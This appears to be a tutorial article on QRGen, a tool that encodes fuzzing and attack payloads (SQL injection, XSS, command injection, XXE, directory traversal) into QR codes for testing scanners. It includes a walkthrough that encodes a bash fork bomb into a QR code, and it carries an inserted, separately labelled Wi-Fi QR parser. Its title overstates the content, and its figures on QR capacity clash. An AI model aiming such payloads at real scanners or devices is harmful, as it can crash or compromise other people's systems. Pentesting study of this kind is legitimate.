How do you crack an android using the QR code?

QR codes are data formats that are useful for everything that needs to be scanned automatically.

Before QR codes there were several other formats, called linear bar codes, which also saved data in a machine-friendly form. You have probably seen the UPC barcode more than once as it is often used to identify products for sale so that cashiers can scan them.



UPC (Universal Product Code) barcode, in use since 1974.
Its purpose is mainly retail and it only encodes a series of numbers, which makes it limited in use. Although there are many different types of linear bar codes, they cannot store much information. Applications such as shipping and car manufacturing required a standard that would contain more data.

What Data Can QR Codes Carry?
QR codes originated in the automotive industry as a way to track cars during production, but their popularity quickly grew beyond that industry.

Like other codes, QR codes can contain a ton of data and even work with reduced resolution or other damage.

A single QR code can contain 4,296 ASCII characters, which gives much more possibilities. You can even format the data to trigger actions when the reader recognizes them.

Thanks to their larger data capacity, one great application of QR codes is managing Wi-Fi connections without typing a password. By encoding the following string, you can create a QR code that automatically logs Android users into the Wi-Fi network.

WIFI:S:<SSID>;T:<WPA|WEP|>;P:<password>;H:<true|false|>;;
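A scanner can split that string into its fields and show the user what it asks for before joining anything. The parser below is an added example, not code from the original article or from QRGen; the function names, warning texts and sample payload are constructed for illustration, and it assumes the usual convention that a backslash escapes ";" and other special characters inside a value.

```python
import re

# One "KEY:value;" field; a backslash escapes the next character (e.g. \; or \\).
_FIELD = re.compile(r'([A-Z0-9]+):((?:\\.|[^\\;])*);')

# Constructed sample payload (not from the article): SSID "Cafe;Guest".
SAMPLE = r'WIFI:S:Cafe\;Guest;T:WEP;P:pa\\ss;H:true;;'

def parse_wifi_qr(text):
    """Split a decoded WIFI: payload into fields without acting on it."""
    if not text.startswith("WIFI:"):
        raise ValueError("not a WIFI: payload")
    fields, pos = {}, 5
    while (m := _FIELD.match(text, pos)):
        # Undo the backslash escaping inside the value.
        fields[m.group(1)] = re.sub(r'\\(.)', r'\1', m.group(2))
        pos = m.end()
    if text[pos:].strip(";"):
        raise ValueError(f"malformed field at offset {pos}")
    if not fields.get("S"):
        raise ValueError("missing SSID (S) field")
    return {
        "ssid": fields["S"],
        "security": fields.get("T") or "nopass",  # empty T means no password
        "password": fields.get("P", ""),
        "hidden": fields.get("H", "").lower() == "true",
    }

def review_wifi_qr(text):
    """Return (fields, warnings) so a user can confirm before joining."""
    info = parse_wifi_qr(text)
    warnings = []
    if info["security"].lower() == "nopass":
        warnings.append("open network: traffic is not encrypted")
    elif info["security"].upper() == "WEP":
        warnings.append("WEP is obsolete and easily broken")
    if info["hidden"]:
        warnings.append("hidden SSID: device will probe for this name")
    if any(ord(c) < 32 for c in info["ssid"]):
        warnings.append("control characters in SSID")
    return info, warnings

if __name__ == "__main__":
    print(review_wifi_qr(SAMPLE))
```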

Anyone who scans a QR code on an Android device will automatically log into an encrypted Wi-Fi network. To see how much data the QR Code can pack, take a look at the code:

This tiny code contains the following text:

Version 40 QR Code can contain up to 1852 chars.
A QR code (abbreviated from Quick Response code) is a type of matrix barcode (or two-dimensional code) that is designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The information encoded may be text, a URL, or other data.
Created by Toyota subsidiary Denso Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes.
The QR code was designed to allow its contents to be decoded at high speed.
The technology has seen frequent use in Japan and South Korea; the United Kingdom is the seventh-largest national consumer of QR codes.
Although initially used for tracking parts in vehicle manufacturing, QR codes are now used in a much broader context,
including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (termed mobile tagging).
QR codes can be used to display text to the user, to add a vCard contact to the user's device, to open a Uniform Resource Identifier (URI), or to compose an e-mail or text message.
Users can generate and print their own QR codes for others to scan and use by visiting one of several paid and free QR codes generating sites or apps.

The text in the image is larger than the QR code itself! The capacity makes QR codes both powerful and dangerous because people cannot understand the data inside them without first scanning them.

QRGen for Malicious QR Codes

Since a person cannot recognize a malicious QR code before it is actually scanned, a relatively large QR code payload can benefit a hacker, especially in combination with vulnerable devices.

The tool that we will use today to create them is called QRGen.

It takes the payload and encodes it in a QR code using Python.

QRGen comes with a built-in library that contains many popular exploits, which is very useful if you have the time to sit down with the same device you want to test and find out which one works. For a pentester who wants to test everything a QR code scanner uses, simply buying the same scanner and running through the exploits can cause the scanner to behave unexpectedly.

The payload categories available in QRGen are selected with the -l flag and a number at runtime. The number and type of payloads are listed below.

0: SQL Injections
1: XSS
2: Command Injection
3: Format String
4: XXE
5: String Fuzzing
6: SSI Injection
7: LFI / Directory Traversal

To create a batch of malicious QR codes containing string-fuzzing payloads for testing, I just need to run qrgen.py -l 5.

What you need


To use QRGen, you need to install Python 3, which should be possible on any operating system. You will also need several Python libraries, including qrcode, Pillow and argparse, which we will also install.

Set Up QRGen

To start, download the repository from GitHub.

~$ git clone https://github.com/h0nus/QRGen

Cloning into 'QRGen'...
Enumerating objects: 86, done.
remote: Counting objects: 100% (86/86), done.
remote: Compressing objects: 100% (78/78), done.
remote: Total 86 (delta 26), reused 4 (delta 1), pack-reused 0
Unpacking objects: 100% (86/86), done.

When the download finishes, change (cd) into its directory and list (ls) its contents to find the file you need.

~$ cd QRGen
~/QRGen$ ls

demo.gif qrgen.py README.md requirements.txt words

Now make sure that all the necessary libraries are installed. To do this, install the requirements file with the following command.

~/QRGen$ pip3 install -r requirements.txt

Collecting qrcode (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collecting argparse (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from qrcode->-r requirements.txt (line 1)) (1.12.0)
Installing collected packages: qrcode, argparse
Successfully installed argparse-1.4.0 qrcode-6.1

If that doesn’t work, there’s an alternative command.

~/QRGen$ python3 -m pip install -r requirements.txt

Create malicious QR codes from payload type

Now you can run the script by typing python3 qrgen.py.

~/QRGen$ python3 qrgen.py

  e88 88e 888 88e e88'Y88
 d888 888b 888 888D d888 'Y, e, 888 8e
C8888 8888D 888 88" C8888 eeee d88 88b 888 88b
 Y888 888P 888 b, Y888 888P 888 , 888 888 888
  "88 88 88" 888 88b, "88 88 88" "YeeP" 888 888 888.
      b
      8b, QRGen ~ v0.1 ~ by h0nus

use: qrgen.py -l [number]
use: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0 : SQL Injections
1 : XSS
2 : Command Injection
3 : Format String
4 : XXE
5 : String Fuzzing
6 : SSI Injection
7 : LFI / Directory Traversal

Tool to generate Malformed QRCodes for fuzzing QRCode parsers/reader

Optional arguments:
  -h, --help show this help message and exit

Options for QRGen:
  --list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
                        Set wordlist to use
  -w WORDLIST, -w WORDLIST.
                        Use a custom wordlist

Pay attention everywhere, even in the dumbest spot

Let’s start by creating a payload. To do this, run QRGen with the following argument.

~/QRGen$ python3 qrgen.py -l 5

  e88 88e 888 88e e88'Y88
 d888 888b 888 888D d888 'Y, e, 888 8e
C8888 8888D 888 88" C8888 eeee d88 88b 888 88b
 Y888 888P 888 b, Y888 888P 888 , 888 888 888
  "88 88 88" 888 88b, "88 88 88" "YeeP" 888 888 888.
      b
      8b, QRGen ~ v0.1 ~ by h0nus

Payload path generated...
Path already cleared or deleted...
Generated 46 payloads!
Opening last generated payloads...
Thanks for using QRGen, made by H0nus...

Several QR codes will be generated and the last one will be automatically opened.

To see the rest of the data, you can type cd genqr to go to the directory where it was created and view its contents.

~/QRGen$ cd genqr
~/QRGen/genqr$ ls

payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png
payload-18.png payload-27.png payload-36.png payload-45.png

Encoding a Payload

To encode a custom payload, we can first create a text file containing what we want to encode.

Each line will be a new payload.

First, create the text file by typing nano badstuff.txt.

~/QRGen/genqr$ nano badstuff.txt

We can put our payload into this text file. The one below is a fork bomb. Will it work on a QR code scanner? Well, who knows.

:(){ :|: & };:

We can save it by pressing Ctrl + X, then press Y and Enter to confirm the saving. You should now see a text file containing your payload.

~/QRGen/genqr$ ls

badstuff.txt payload-18.png payload-27.png payload-36.png payload-45.png
payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png

To write our payload into a QR code, we will use the -w option.
Assuming that your payload file is called “badstuff.txt”, the command should look like this (remember to return to the QRGen directory first).

~/QRGen/genqr$ cd ..
~/QRGen$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt'

  e88 88e 888 88e e88'Y88
 d888 888b 888 888D d888 'Y, e, 888 8e
C8888 8888D 888 88" C8888 eeee d88 88b 888 88b
 Y888 888P 888 b, Y888 888P 888 , 888 888 888
  "88 88 88" 888 88b, "88 88 88" "YeeP" 888 888 888.
      b
      8b, QRGen ~ v0.1 ~ by h0nus

Payload path exist, continuing...
Path already cleared or deleted...
Generated 1 payloads!
Opening last generated payloads...
Thanks for using QRGen, made by H0nus...

The program generates a QR code for my bomb.

Not all QR codes should be scanned

QR codes can encode a lot of information, and as we learned today, they can even be programmed to make the device do something.

This makes scanning a QR code risky because a person is not able to read the information before scanning. If you scan a QR code that seems suspicious, pay attention to what the code is trying to do, and do not connect to a Wi-Fi network or open a shortened link.

